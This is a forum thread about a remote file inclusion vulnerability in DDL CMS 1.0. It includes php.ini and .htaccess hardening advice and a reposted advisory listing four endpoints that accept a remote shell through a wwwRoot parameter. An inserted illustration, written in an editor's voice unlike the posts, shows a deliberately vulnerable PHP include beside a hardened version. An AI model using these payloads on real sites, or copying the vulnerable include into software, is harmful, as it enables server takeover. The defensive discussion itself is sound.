Status
Not open for further replies.
16 comments
Can you even confirm someone has found an exploit in the script and isn't just exploiting poorly secured sites (server config or whatever)? Well, either way, I doubt any of us will go through every line of code to find out.
 
Two things,

There is probably always an exploit in some code, and that's one of them. DDL CMS I think has it patched in an upcoming release which is apparently right around the corner.

Second, all this does is allow somebody to download your SQL database... which quite frankly I could care less about. Good luck trying to hack anything from that database, and besides, most sites using this will have just a big warez database of files which you can upload to your site lol.

Anyhow good that it's being fixed.
 
Actually, Switchblade, if the user downloads your database and the MySQL server allows remote connections, a user can simply log on to your database and, if it is a forum, can grant themselves admin rights and therefore add multiple stuff to the forums, keylogging accounts or more.
 
This shouldn't be a problem; most hosts turn allow_url_include off by default since it's unsafe.

To check, just use a phpinfo.php file. Open a text editor and place the following code:

Code:
<?php
phpinfo();
?>

Save it as phpinfo.php, then upload it to your webserver and run it in your browser, like http://yourdomain.com/phpinfo.php

Under PHP Core, you should find allow_url_include, and the local value should be Off.

If it's On, then you need to disable it in php.ini and also in your .htaccess.

You can find php.ini under /usr/local/lib

Add/edit this line in your php.ini:

Code:
allow_url_include = Off

You also need to add the following line in your .htaccess:

Code:
php_flag allow_url_include 0
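As an added illustration (not DDL CMS's own source), here is a hypothetical header.php of the shape that the `?wwwRoot=` URLs in the exploit listing in this thread target, next to a hardened version: it shows why turning allow_url_include off limits the damage but does not fix the include itself. It assumes an installer-defined constant APP_ROOT and a pages/ directory; both are assumptions, not anything from DDL CMS.

```php
<?php
// Added illustration, not DDL CMS source. vulnerable_header() has the
// shape that "?wwwRoot=http://host/shell.txt?" targets: the trailing "?"
// turns the appended "/config.php" into a query string, so PHP fetches and
// runs shell.txt. With allow_url_include=Off the remote fetch fails, but
// "?wwwRoot=../../uploads" still includes a local file, so the runtime
// flag limits the damage without fixing the application.
function vulnerable_header(array $get): void
{
    $wwwRoot = $get['wwwRoot'] ?? '.';
    include $wwwRoot . '/config.php';   // request data in an include path
}

// Hardened: the root is fixed at install time (assumption: the installer
// defines APP_ROOT), and the only request value that selects a file is
// matched against an allowlist, then canonicalised and confined to
// APP_ROOT before it reaches require.
define('APP_ROOT', realpath(__DIR__));

const ALLOWED_PAGES = ['home', 'submit', 'submitted'];

function resolve_page(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                    // unknown name: refuse, never guess
    }
    $path = realpath(APP_ROOT . '/pages/' . $page . '.php');
    // realpath() collapses ".." and symlinks; anything that resolves
    // outside APP_ROOT, or does not exist, is rejected the same way.
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function hardened_header(array $get): void
{
    require APP_ROOT . '/config.php';   // constant path, no request data
    $page = resolve_page((string) ($get['page'] ?? 'home'));
    if ($page === null) {
        http_response_code(400);
        exit('unknown page');
    }
    require $page;
}
```

In current PHP, allow_url_include is a PHP_INI_SYSTEM directive, so it takes effect from php.ini or a php_admin_flag line in the main Apache configuration; a php_flag line in .htaccess cannot change it, which is one more reason to fix the include rather than rely on the flag.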
 
Here is the exploit; it was posted on milw0rm on the 21st of this month.

Code:
+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+
Code:
http://www.milw0rm.com/exploits/9722
 